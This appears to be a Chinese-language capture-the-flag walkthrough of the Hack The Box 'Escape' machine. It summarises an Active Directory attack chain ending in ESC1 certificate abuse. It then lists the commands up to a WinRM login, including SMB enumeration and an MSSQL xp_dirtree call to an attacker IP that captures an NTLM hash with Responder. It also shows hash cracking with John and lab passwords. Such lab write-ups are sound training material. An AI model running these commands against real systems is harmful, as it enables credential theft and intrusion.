Skip to content

HTB-Escape

概要

Escap 是一个中等难度的 Windwos Active Directory 机器,以 SMB 共享启动,经过身份验证的来宾用户可以下载敏感的 PDF 文件。PDF 文件内的临时凭据可用于访问计算机运行的 MSSQL 服务。攻击者能够控制 MSSQL 服务对其计算机进行身份验证并捕获 HASH。事实证明,该服务正在用户账户下运行,并且 HASH 是可破解的。拥有一组有效的凭据后,攻击者能够使用 WinRM 在计算机上执行系统命令。枚举计算机时,日志文件会显示用于进一步枚举计算机的凭据,显示存在证书颁发机构和用户 ryan.cooper。使用 Certify 工具可以检测到一个证书模板容易受到 ESC1 攻击,这意味着能够使用此模板的用户可以对域中任何用户请求证书。因此,利用 ESC1 漏洞,攻击者能够获取管理员账户的有效证书,然后使用它来获取管理员用户的 HASH。

SMB 信息泄露

枚举主机 smb 信息

smbclient -L \\\\ sequel.htb\\

登录 public 账户

smbclient \\\\sequel\\public

在 PDF 文件里找到用户账户信息

smb: \> ls
SQL Server Procedures.pdf

使用 impacket MsSQL客户端连接

impacket-mssqlclient PublicUser:GuestUserCantWrite1@sequal.htb

在机器上监听网卡

responder -I tun0 -v

在 MsSQL 上强制执行某某·

EXEC MASTER.sys.xp_dirtree '\\10.10.14.4\test', 1, 1

监听到了会连的 Hash,使用 John 破解。

john --wordlist=/../rockyou.txt hash

得到系统账户密码 sql_srv:REGGIE1234ronnie

ls C:\users

使用 evil-winrm 连接 Windows 命令行

evil-winrm -i sequel.htb -u ryan.cooper -p NuclearMosquito3